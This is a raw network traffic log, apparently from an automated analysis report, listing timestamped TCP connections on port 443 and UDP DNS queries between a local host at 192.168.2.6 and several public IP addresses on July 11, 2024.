Jul 11, 2024 00:38:24.195888042 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:24.195926905 CEST	49721	443	192.168.2.6	13.227.219.97
Jul 11, 2024 00:38:24.195959091 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:24.196013927 CEST	49721	443	192.168.2.6	13.227.219.97
Jul 11, 2024 00:38:24.220104933 CEST	443	49719	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:24.220302105 CEST	443	49719	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:24.220360994 CEST	49719	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:24.220666885 CEST	49719	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:24.220696926 CEST	443	49719	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:24.221678972 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:24.221695900 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:24.221726894 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:24.221748114 CEST	49721	443	192.168.2.6	13.227.219.97
Jul 11, 2024 00:38:24.221780062 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:24.221796036 CEST	49721	443	192.168.2.6	13.227.219.97
Jul 11, 2024 00:38:24.221802950 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:24.221833944 CEST	49721	443	192.168.2.6	13.227.219.97
Jul 11, 2024 00:38:24.224818945 CEST	49721	443	192.168.2.6	13.227.219.97
Jul 11, 2024 00:38:24.224843979 CEST	443	49721	13.227.219.97	192.168.2.6
Jul 11, 2024 00:38:24.510502100 CEST	49673	443	192.168.2.6	173.222.162.64
Jul 11, 2024 00:38:24.518094063 CEST	49674	443	192.168.2.6	173.222.162.64
Jul 11, 2024 00:38:24.628762007 CEST	49722	443	192.168.2.6	216.58.206.68
Jul 11, 2024 00:38:24.628808975 CEST	443	49722	216.58.206.68	192.168.2.6
Jul 11, 2024 00:38:24.628868103 CEST	49722	443	192.168.2.6	216.58.206.68
Jul 11, 2024 00:38:24.629533052 CEST	49722	443	192.168.2.6	216.58.206.68
Jul 11, 2024 00:38:24.629545927 CEST	443	49722	216.58.206.68	192.168.2.6
Jul 11, 2024 00:38:24.864499092 CEST	49672	443	192.168.2.6	173.222.162.64
Jul 11, 2024 00:38:25.200263977 CEST	49723	443	192.168.2.6	184.28.90.27
Jul 11, 2024 00:38:25.200309038 CEST	443	49723	184.28.90.27	192.168.2.6
Jul 11, 2024 00:38:25.200372934 CEST	49723	443	192.168.2.6	184.28.90.27
Jul 11, 2024 00:38:25.220803976 CEST	49723	443	192.168.2.6	184.28.90.27
Jul 11, 2024 00:38:25.220841885 CEST	443	49723	184.28.90.27	192.168.2.6
Jul 11, 2024 00:38:25.324059963 CEST	443	49722	216.58.206.68	192.168.2.6
Jul 11, 2024 00:38:25.324949980 CEST	49722	443	192.168.2.6	216.58.206.68
Jul 11, 2024 00:38:25.324975014 CEST	443	49722	216.58.206.68	192.168.2.6
Jul 11, 2024 00:38:25.325977087 CEST	443	49722	216.58.206.68	192.168.2.6
Jul 11, 2024 00:38:25.326033115 CEST	49722	443	192.168.2.6	216.58.206.68
Jul 11, 2024 00:38:25.331593037 CEST	49722	443	192.168.2.6	216.58.206.68
Jul 11, 2024 00:38:25.331659079 CEST	443	49722	216.58.206.68	192.168.2.6
Jul 11, 2024 00:38:25.372528076 CEST	49722	443	192.168.2.6	216.58.206.68
Jul 11, 2024 00:38:25.372545004 CEST	443	49722	216.58.206.68	192.168.2.6
Jul 11, 2024 00:38:25.427336931 CEST	49722	443	192.168.2.6	216.58.206.68
Jul 11, 2024 00:38:25.884969950 CEST	443	49723	184.28.90.27	192.168.2.6
Jul 11, 2024 00:38:25.885051012 CEST	49723	443	192.168.2.6	184.28.90.27
Jul 11, 2024 00:38:25.889427900 CEST	49723	443	192.168.2.6	184.28.90.27
Jul 11, 2024 00:38:25.889446974 CEST	443	49723	184.28.90.27	192.168.2.6
Jul 11, 2024 00:38:25.889684916 CEST	443	49723	184.28.90.27	192.168.2.6
Jul 11, 2024 00:38:25.930368900 CEST	49723	443	192.168.2.6	184.28.90.27
Jul 11, 2024 00:38:26.111365080 CEST	49723	443	192.168.2.6	184.28.90.27
Jul 11, 2024 00:38:26.156500101 CEST	443	49723	184.28.90.27	192.168.2.6
Jul 11, 2024 00:38:26.303780079 CEST	443	49723	184.28.90.27	192.168.2.6
Jul 11, 2024 00:38:26.303831100 CEST	443	49723	184.28.90.27	192.168.2.6
Jul 11, 2024 00:38:26.303877115 CEST	49723	443	192.168.2.6	184.28.90.27
Jul 11, 2024 00:38:26.303991079 CEST	49723	443	192.168.2.6	184.28.90.27
Jul 11, 2024 00:38:26.304022074 CEST	443	49723	184.28.90.27	192.168.2.6
Jul 11, 2024 00:38:26.304033995 CEST	49723	443	192.168.2.6	184.28.90.27
Jul 11, 2024 00:38:26.304047108 CEST	443	49723	184.28.90.27	192.168.2.6
Jul 11, 2024 00:38:26.339967966 CEST	49724	443	192.168.2.6	184.28.90.27
Jul 11, 2024 00:38:26.340012074 CEST	443	49724	184.28.90.27	192.168.2.6
Jul 11, 2024 00:38:26.340084076 CEST	49724	443	192.168.2.6	184.28.90.27
Jul 11, 2024 00:38:26.340322971 CEST	49724	443	192.168.2.6	184.28.90.27
Jul 11, 2024 00:38:26.340342999 CEST	443	49724	184.28.90.27	192.168.2.6
Jul 11, 2024 00:38:26.532995939 CEST	443	49705	173.222.162.64	192.168.2.6
Jul 11, 2024 00:38:26.533118963 CEST	49705	443	192.168.2.6	173.222.162.64
Jul 11, 2024 00:38:26.994887114 CEST	443	49724	184.28.90.27	192.168.2.6
Jul 11, 2024 00:38:26.995013952 CEST	49724	443	192.168.2.6	184.28.90.27
Jul 11, 2024 00:38:26.996455908 CEST	49724	443	192.168.2.6	184.28.90.27
Jul 11, 2024 00:38:26.996496916 CEST	443	49724	184.28.90.27	192.168.2.6
Jul 11, 2024 00:38:26.996731043 CEST	443	49724	184.28.90.27	192.168.2.6
Jul 11, 2024 00:38:26.998049974 CEST	49724	443	192.168.2.6	184.28.90.27
Jul 11, 2024 00:38:27.044501066 CEST	443	49724	184.28.90.27	192.168.2.6
Jul 11, 2024 00:38:27.275775909 CEST	443	49724	184.28.90.27	192.168.2.6
Jul 11, 2024 00:38:27.275849104 CEST	443	49724	184.28.90.27	192.168.2.6
Jul 11, 2024 00:38:27.276108027 CEST	49724	443	192.168.2.6	184.28.90.27
Jul 11, 2024 00:38:27.289936066 CEST	49724	443	192.168.2.6	184.28.90.27
Jul 11, 2024 00:38:27.290005922 CEST	443	49724	184.28.90.27	192.168.2.6
Jul 11, 2024 00:38:27.290049076 CEST	49724	443	192.168.2.6	184.28.90.27
Jul 11, 2024 00:38:27.290067911 CEST	443	49724	184.28.90.27	192.168.2.6
Jul 11, 2024 00:38:31.166501045 CEST	49725	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:31.166548014 CEST	443	49725	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:31.166620970 CEST	49725	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:31.167274952 CEST	49725	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:31.167289019 CEST	443	49725	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:32.892842054 CEST	443	49725	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:32.892951965 CEST	49725	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:32.896969080 CEST	49725	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:32.896996021 CEST	443	49725	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:32.897249937 CEST	443	49725	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:32.900528908 CEST	49725	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:32.900594950 CEST	49725	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:32.900612116 CEST	443	49725	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:32.900897980 CEST	49725	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:32.948501110 CEST	443	49725	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:33.070856094 CEST	443	49725	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:33.071520090 CEST	49725	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:33.071568012 CEST	443	49725	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:33.071592093 CEST	443	49725	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:33.071597099 CEST	49725	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:33.071638107 CEST	443	49725	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:33.071660995 CEST	49725	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:35.202200890 CEST	443	49722	216.58.206.68	192.168.2.6
Jul 11, 2024 00:38:35.202387094 CEST	443	49722	216.58.206.68	192.168.2.6
Jul 11, 2024 00:38:35.202441931 CEST	49722	443	192.168.2.6	216.58.206.68
Jul 11, 2024 00:38:36.878587008 CEST	49722	443	192.168.2.6	216.58.206.68
Jul 11, 2024 00:38:36.878628969 CEST	443	49722	216.58.206.68	192.168.2.6
Jul 11, 2024 00:38:43.074873924 CEST	443	49720	104.21.84.200	192.168.2.6
Jul 11, 2024 00:38:43.074955940 CEST	443	49720	104.21.84.200	192.168.2.6
Jul 11, 2024 00:38:43.075006962 CEST	49720	443	192.168.2.6	104.21.84.200
Jul 11, 2024 00:38:43.075831890 CEST	49720	443	192.168.2.6	104.21.84.200
Jul 11, 2024 00:38:43.075853109 CEST	443	49720	104.21.84.200	192.168.2.6
Jul 11, 2024 00:38:43.121649027 CEST	49730	443	192.168.2.6	209.94.90.1
Jul 11, 2024 00:38:43.121752024 CEST	443	49730	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:43.121809006 CEST	49730	443	192.168.2.6	209.94.90.1
Jul 11, 2024 00:38:43.122267008 CEST	49730	443	192.168.2.6	209.94.90.1
Jul 11, 2024 00:38:43.122302055 CEST	443	49730	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:43.137372017 CEST	49731	443	192.168.2.6	35.190.80.1
Jul 11, 2024 00:38:43.137412071 CEST	443	49731	35.190.80.1	192.168.2.6
Jul 11, 2024 00:38:43.137474060 CEST	49731	443	192.168.2.6	35.190.80.1
Jul 11, 2024 00:38:43.137769938 CEST	49731	443	192.168.2.6	35.190.80.1
Jul 11, 2024 00:38:43.137785912 CEST	443	49731	35.190.80.1	192.168.2.6
Jul 11, 2024 00:38:43.607106924 CEST	443	49730	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:43.607428074 CEST	49730	443	192.168.2.6	209.94.90.1
Jul 11, 2024 00:38:43.607500076 CEST	443	49730	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:43.607861042 CEST	443	49730	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:43.608196020 CEST	49730	443	192.168.2.6	209.94.90.1
Jul 11, 2024 00:38:43.608267069 CEST	443	49730	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:43.608345032 CEST	49730	443	192.168.2.6	209.94.90.1
Jul 11, 2024 00:38:43.628253937 CEST	443	49731	35.190.80.1	192.168.2.6
Jul 11, 2024 00:38:43.628478050 CEST	49731	443	192.168.2.6	35.190.80.1
Jul 11, 2024 00:38:43.628549099 CEST	443	49731	35.190.80.1	192.168.2.6
Jul 11, 2024 00:38:43.629455090 CEST	443	49731	35.190.80.1	192.168.2.6
Jul 11, 2024 00:38:43.629519939 CEST	49731	443	192.168.2.6	35.190.80.1
Jul 11, 2024 00:38:43.652512074 CEST	443	49730	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:43.746726036 CEST	443	49730	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:43.746961117 CEST	443	49730	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:43.747123957 CEST	49730	443	192.168.2.6	209.94.90.1
Jul 11, 2024 00:38:43.748625040 CEST	49730	443	192.168.2.6	209.94.90.1
Jul 11, 2024 00:38:43.748673916 CEST	443	49730	209.94.90.1	192.168.2.6
Jul 11, 2024 00:38:43.751770020 CEST	49731	443	192.168.2.6	35.190.80.1
Jul 11, 2024 00:38:43.751988888 CEST	443	49731	35.190.80.1	192.168.2.6
Jul 11, 2024 00:38:43.753757000 CEST	49731	443	192.168.2.6	35.190.80.1
Jul 11, 2024 00:38:43.753820896 CEST	443	49731	35.190.80.1	192.168.2.6
Jul 11, 2024 00:38:43.768518925 CEST	49732	443	192.168.2.6	185.93.3.244
Jul 11, 2024 00:38:43.768551111 CEST	443	49732	185.93.3.244	192.168.2.6
Jul 11, 2024 00:38:43.768615961 CEST	49732	443	192.168.2.6	185.93.3.244
Jul 11, 2024 00:38:43.769176006 CEST	49732	443	192.168.2.6	185.93.3.244
Jul 11, 2024 00:38:43.769188881 CEST	443	49732	185.93.3.244	192.168.2.6
Jul 11, 2024 00:38:43.800044060 CEST	49731	443	192.168.2.6	35.190.80.1
Jul 11, 2024 00:38:43.882395983 CEST	443	49731	35.190.80.1	192.168.2.6
Jul 11, 2024 00:38:43.882775068 CEST	443	49731	35.190.80.1	192.168.2.6
Jul 11, 2024 00:38:43.882827997 CEST	49731	443	192.168.2.6	35.190.80.1
Jul 11, 2024 00:38:43.882955074 CEST	49731	443	192.168.2.6	35.190.80.1
Jul 11, 2024 00:38:43.882972956 CEST	443	49731	35.190.80.1	192.168.2.6
Jul 11, 2024 00:38:43.882982016 CEST	49731	443	192.168.2.6	35.190.80.1
Jul 11, 2024 00:38:43.883018017 CEST	49731	443	192.168.2.6	35.190.80.1
Jul 11, 2024 00:38:43.884718895 CEST	49733	443	192.168.2.6	35.190.80.1
Jul 11, 2024 00:38:43.884738922 CEST	443	49733	35.190.80.1	192.168.2.6
Jul 11, 2024 00:38:43.884792089 CEST	49733	443	192.168.2.6	35.190.80.1
Jul 11, 2024 00:38:43.885651112 CEST	49733	443	192.168.2.6	35.190.80.1
Jul 11, 2024 00:38:43.885663986 CEST	443	49733	35.190.80.1	192.168.2.6
Jul 11, 2024 00:38:44.343799114 CEST	443	49733	35.190.80.1	192.168.2.6
Jul 11, 2024 00:38:44.387295961 CEST	49733	443	192.168.2.6	35.190.80.1
Jul 11, 2024 00:38:44.387326956 CEST	443	49733	35.190.80.1	192.168.2.6
Jul 11, 2024 00:38:44.387815952 CEST	443	49733	35.190.80.1	192.168.2.6
Jul 11, 2024 00:38:44.407547951 CEST	49733	443	192.168.2.6	35.190.80.1
Jul 11, 2024 00:38:44.407643080 CEST	443	49733	35.190.80.1	192.168.2.6
Jul 11, 2024 00:38:44.411925077 CEST	49733	443	192.168.2.6	35.190.80.1
Jul 11, 2024 00:38:44.456497908 CEST	443	49733	35.190.80.1	192.168.2.6
Jul 11, 2024 00:38:44.514626980 CEST	443	49732	185.93.3.244	192.168.2.6
Jul 11, 2024 00:38:44.515265942 CEST	49732	443	192.168.2.6	185.93.3.244
Jul 11, 2024 00:38:44.515280962 CEST	443	49732	185.93.3.244	192.168.2.6
Jul 11, 2024 00:38:44.516459942 CEST	443	49732	185.93.3.244	192.168.2.6
Jul 11, 2024 00:38:44.516535997 CEST	49732	443	192.168.2.6	185.93.3.244
Jul 11, 2024 00:38:44.518011093 CEST	49732	443	192.168.2.6	185.93.3.244
Jul 11, 2024 00:38:44.518084049 CEST	443	49732	185.93.3.244	192.168.2.6
Jul 11, 2024 00:38:44.518337965 CEST	49732	443	192.168.2.6	185.93.3.244
Jul 11, 2024 00:38:44.518347979 CEST	443	49732	185.93.3.244	192.168.2.6
Jul 11, 2024 00:38:44.537823915 CEST	443	49733	35.190.80.1	192.168.2.6
Jul 11, 2024 00:38:44.537889004 CEST	443	49733	35.190.80.1	192.168.2.6
Jul 11, 2024 00:38:44.537966967 CEST	49733	443	192.168.2.6	35.190.80.1
Jul 11, 2024 00:38:44.538307905 CEST	49733	443	192.168.2.6	35.190.80.1
Jul 11, 2024 00:38:44.538347006 CEST	443	49733	35.190.80.1	192.168.2.6
Jul 11, 2024 00:38:44.565670013 CEST	49732	443	192.168.2.6	185.93.3.244
Jul 11, 2024 00:38:44.832621098 CEST	443	49732	185.93.3.244	192.168.2.6
Jul 11, 2024 00:38:44.832644939 CEST	443	49732	185.93.3.244	192.168.2.6
Jul 11, 2024 00:38:44.832674026 CEST	443	49732	185.93.3.244	192.168.2.6
Jul 11, 2024 00:38:44.832679987 CEST	443	49732	185.93.3.244	192.168.2.6
Jul 11, 2024 00:38:44.832703114 CEST	443	49732	185.93.3.244	192.168.2.6
Jul 11, 2024 00:38:44.832752943 CEST	49732	443	192.168.2.6	185.93.3.244
Jul 11, 2024 00:38:44.832752943 CEST	49732	443	192.168.2.6	185.93.3.244
Jul 11, 2024 00:38:44.832773924 CEST	443	49732	185.93.3.244	192.168.2.6
Jul 11, 2024 00:38:44.832854033 CEST	49732	443	192.168.2.6	185.93.3.244
Jul 11, 2024 00:38:44.833573103 CEST	49732	443	192.168.2.6	185.93.3.244
Jul 11, 2024 00:38:44.833586931 CEST	443	49732	185.93.3.244	192.168.2.6
Jul 11, 2024 00:38:45.532531977 CEST	49734	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:45.532577038 CEST	443	49734	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:45.532641888 CEST	49734	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:45.533617973 CEST	49734	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:45.533633947 CEST	443	49734	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:45.548602104 CEST	49735	443	192.168.2.6	169.150.247.39
Jul 11, 2024 00:38:45.548640013 CEST	443	49735	169.150.247.39	192.168.2.6
Jul 11, 2024 00:38:45.548803091 CEST	49735	443	192.168.2.6	169.150.247.39
Jul 11, 2024 00:38:45.549089909 CEST	49735	443	192.168.2.6	169.150.247.39
Jul 11, 2024 00:38:45.549102068 CEST	443	49735	169.150.247.39	192.168.2.6
Jul 11, 2024 00:38:46.305639982 CEST	443	49735	169.150.247.39	192.168.2.6
Jul 11, 2024 00:38:46.305903912 CEST	49735	443	192.168.2.6	169.150.247.39
Jul 11, 2024 00:38:46.305924892 CEST	443	49735	169.150.247.39	192.168.2.6
Jul 11, 2024 00:38:46.306981087 CEST	443	49735	169.150.247.39	192.168.2.6
Jul 11, 2024 00:38:46.307049036 CEST	49735	443	192.168.2.6	169.150.247.39
Jul 11, 2024 00:38:46.307404995 CEST	49735	443	192.168.2.6	169.150.247.39
Jul 11, 2024 00:38:46.307471991 CEST	443	49735	169.150.247.39	192.168.2.6
Jul 11, 2024 00:38:46.307549953 CEST	49735	443	192.168.2.6	169.150.247.39
Jul 11, 2024 00:38:46.307559013 CEST	443	49735	169.150.247.39	192.168.2.6
Jul 11, 2024 00:38:46.348043919 CEST	49735	443	192.168.2.6	169.150.247.39
Jul 11, 2024 00:38:46.354998112 CEST	443	49734	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:46.355081081 CEST	49734	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:46.360768080 CEST	49734	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:46.360785007 CEST	443	49734	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:46.361530066 CEST	443	49734	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:46.363243103 CEST	49734	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:46.363308907 CEST	49734	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:46.363315105 CEST	443	49734	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:46.363430977 CEST	49734	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:46.404505014 CEST	443	49734	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:46.538835049 CEST	443	49734	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:46.539040089 CEST	443	49734	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:46.539099932 CEST	49734	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:46.539195061 CEST	49734	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:38:46.539212942 CEST	443	49734	40.113.103.199	192.168.2.6
Jul 11, 2024 00:38:46.589046001 CEST	443	49735	169.150.247.39	192.168.2.6
Jul 11, 2024 00:38:46.622356892 CEST	443	49735	169.150.247.39	192.168.2.6
Jul 11, 2024 00:38:46.622369051 CEST	443	49735	169.150.247.39	192.168.2.6
Jul 11, 2024 00:38:46.622426033 CEST	49735	443	192.168.2.6	169.150.247.39
Jul 11, 2024 00:38:46.622438908 CEST	443	49735	169.150.247.39	192.168.2.6
Jul 11, 2024 00:38:46.622478008 CEST	443	49735	169.150.247.39	192.168.2.6
Jul 11, 2024 00:38:46.622495890 CEST	443	49735	169.150.247.39	192.168.2.6
Jul 11, 2024 00:38:46.622497082 CEST	49735	443	192.168.2.6	169.150.247.39
Jul 11, 2024 00:38:46.622523069 CEST	49735	443	192.168.2.6	169.150.247.39
Jul 11, 2024 00:38:46.622541904 CEST	49735	443	192.168.2.6	169.150.247.39
Jul 11, 2024 00:38:46.623887062 CEST	49735	443	192.168.2.6	169.150.247.39
Jul 11, 2024 00:38:46.623905897 CEST	443	49735	169.150.247.39	192.168.2.6
Jul 11, 2024 00:39:07.465029001 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:07.465069056 CEST	443	49736	40.113.103.199	192.168.2.6
Jul 11, 2024 00:39:07.465172052 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:07.465683937 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:07.465703011 CEST	443	49736	40.113.103.199	192.168.2.6
Jul 11, 2024 00:39:08.290271044 CEST	443	49736	40.113.103.199	192.168.2.6
Jul 11, 2024 00:39:08.290373087 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:08.293962955 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:08.293975115 CEST	443	49736	40.113.103.199	192.168.2.6
Jul 11, 2024 00:39:08.294759035 CEST	443	49736	40.113.103.199	192.168.2.6
Jul 11, 2024 00:39:08.297512054 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:08.297570944 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:08.297576904 CEST	443	49736	40.113.103.199	192.168.2.6
Jul 11, 2024 00:39:08.297789097 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:08.344505072 CEST	443	49736	40.113.103.199	192.168.2.6
Jul 11, 2024 00:39:08.475802898 CEST	443	49736	40.113.103.199	192.168.2.6
Jul 11, 2024 00:39:08.476505995 CEST	443	49736	40.113.103.199	192.168.2.6
Jul 11, 2024 00:39:08.476583004 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:08.476747036 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:08.476766109 CEST	443	49736	40.113.103.199	192.168.2.6
Jul 11, 2024 00:39:08.476778984 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:24.665783882 CEST	49739	443	192.168.2.6	216.58.206.68
Jul 11, 2024 00:39:24.665887117 CEST	443	49739	216.58.206.68	192.168.2.6
Jul 11, 2024 00:39:24.665973902 CEST	49739	443	192.168.2.6	216.58.206.68
Jul 11, 2024 00:39:24.666527033 CEST	49739	443	192.168.2.6	216.58.206.68
Jul 11, 2024 00:39:24.666589975 CEST	443	49739	216.58.206.68	192.168.2.6
Jul 11, 2024 00:39:25.331407070 CEST	443	49739	216.58.206.68	192.168.2.6
Jul 11, 2024 00:39:25.332132101 CEST	49739	443	192.168.2.6	216.58.206.68
Jul 11, 2024 00:39:25.332202911 CEST	443	49739	216.58.206.68	192.168.2.6
Jul 11, 2024 00:39:25.332590103 CEST	443	49739	216.58.206.68	192.168.2.6
Jul 11, 2024 00:39:25.334387064 CEST	49739	443	192.168.2.6	216.58.206.68
Jul 11, 2024 00:39:25.334465981 CEST	443	49739	216.58.206.68	192.168.2.6
Jul 11, 2024 00:39:25.377552986 CEST	49739	443	192.168.2.6	216.58.206.68
Jul 11, 2024 00:39:30.073395014 CEST	49740	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:30.073514938 CEST	443	49740	40.113.103.199	192.168.2.6
Jul 11, 2024 00:39:30.073739052 CEST	49740	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:30.074254990 CEST	49740	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:30.074315071 CEST	443	49740	40.113.103.199	192.168.2.6
Jul 11, 2024 00:39:30.997078896 CEST	443	49740	40.113.103.199	192.168.2.6
Jul 11, 2024 00:39:30.997154951 CEST	49740	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:31.004630089 CEST	49740	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:31.004637003 CEST	443	49740	40.113.103.199	192.168.2.6
Jul 11, 2024 00:39:31.004981041 CEST	443	49740	40.113.103.199	192.168.2.6
Jul 11, 2024 00:39:31.011032104 CEST	49740	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:31.011261940 CEST	49740	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:31.011266947 CEST	443	49740	40.113.103.199	192.168.2.6
Jul 11, 2024 00:39:31.011706114 CEST	49740	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:31.056490898 CEST	443	49740	40.113.103.199	192.168.2.6
Jul 11, 2024 00:39:31.186403036 CEST	443	49740	40.113.103.199	192.168.2.6
Jul 11, 2024 00:39:31.186508894 CEST	443	49740	40.113.103.199	192.168.2.6
Jul 11, 2024 00:39:31.186575890 CEST	49740	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:31.186850071 CEST	49740	443	192.168.2.6	40.113.103.199
Jul 11, 2024 00:39:31.186870098 CEST	443	49740	40.113.103.199	192.168.2.6
Jul 11, 2024 00:39:35.234235048 CEST	443	49739	216.58.206.68	192.168.2.6
Jul 11, 2024 00:39:35.234390974 CEST	443	49739	216.58.206.68	192.168.2.6
Jul 11, 2024 00:39:35.234446049 CEST	49739	443	192.168.2.6	216.58.206.68
Jul 11, 2024 00:39:36.833806038 CEST	49739	443	192.168.2.6	216.58.206.68
Jul 11, 2024 00:39:36.833879948 CEST	443	49739	216.58.206.68	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 11, 2024 00:38:20.474819899 CEST	53	54431	1.1.1.1	192.168.2.6
Jul 11, 2024 00:38:20.531820059 CEST	53	56331	1.1.1.1	192.168.2.6
Jul 11, 2024 00:38:21.545531988 CEST	53	54153	1.1.1.1	192.168.2.6
Jul 11, 2024 00:38:22.433826923 CEST	55698	53	192.168.2.6	1.1.1.1
Jul 11, 2024 00:38:22.434006929 CEST	51574	53	192.168.2.6	1.1.1.1
Jul 11, 2024 00:38:22.441828012 CEST	53	55698	1.1.1.1	192.168.2.6
Jul 11, 2024 00:38:22.444546938 CEST	53	51574	1.1.1.1	192.168.2.6
Jul 11, 2024 00:38:22.449309111 CEST	63900	53	192.168.2.6	1.1.1.1
Jul 11, 2024 00:38:22.449556112 CEST	64681	53	192.168.2.6	1.1.1.1
Jul 11, 2024 00:38:22.456634045 CEST	53	63900	1.1.1.1	192.168.2.6
Jul 11, 2024 00:38:22.457480907 CEST	53	64681	1.1.1.1	192.168.2.6
Jul 11, 2024 00:38:23.118355036 CEST	65425	53	192.168.2.6	1.1.1.1
Jul 11, 2024 00:38:23.118499041 CEST	60982	53	192.168.2.6	1.1.1.1
Jul 11, 2024 00:38:23.119050980 CEST	64631	53	192.168.2.6	1.1.1.1
Jul 11, 2024 00:38:23.119262934 CEST	60817	53	192.168.2.6	1.1.1.1
Jul 11, 2024 00:38:23.134298086 CEST	53	60817	1.1.1.1	192.168.2.6
Jul 11, 2024 00:38:23.147367001 CEST	53	60982	1.1.1.1	192.168.2.6
Jul 11, 2024 00:38:23.156585932 CEST	53	64631	1.1.1.1	192.168.2.6
Jul 11, 2024 00:38:23.161449909 CEST	53	65425	1.1.1.1	192.168.2.6
Jul 11, 2024 00:38:24.614917040 CEST	64685	53	192.168.2.6	1.1.1.1
Jul 11, 2024 00:38:24.615509987 CEST	63167	53	192.168.2.6	1.1.1.1
Jul 11, 2024 00:38:24.625581980 CEST	53	64685	1.1.1.1	192.168.2.6
Jul 11, 2024 00:38:24.626542091 CEST	53	63167	1.1.1.1	192.168.2.6
Jul 11, 2024 00:38:38.654650927 CEST	53	51134	1.1.1.1	192.168.2.6
Jul 11, 2024 00:38:43.119363070 CEST	65435	53	192.168.2.6	1.1.1.1
Jul 11, 2024 00:38:43.119807005 CEST	57789	53	192.168.2.6	1.1.1.1
Jul 11, 2024 00:38:43.135627985 CEST	53	65435	1.1.1.1	192.168.2.6
Jul 11, 2024 00:38:43.136919975 CEST	53	57789	1.1.1.1	192.168.2.6
Jul 11, 2024 00:38:43.755583048 CEST	55550	53	192.168.2.6	1.1.1.1
Jul 11, 2024 00:38:43.755862951 CEST	56129	53	192.168.2.6	1.1.1.1
Jul 11, 2024 00:38:43.766691923 CEST	53	56129	1.1.1.1	192.168.2.6
Jul 11, 2024 00:38:43.767354965 CEST	53	55550	1.1.1.1	192.168.2.6
Jul 11, 2024 00:38:45.536233902 CEST	50071	53	192.168.2.6	1.1.1.1
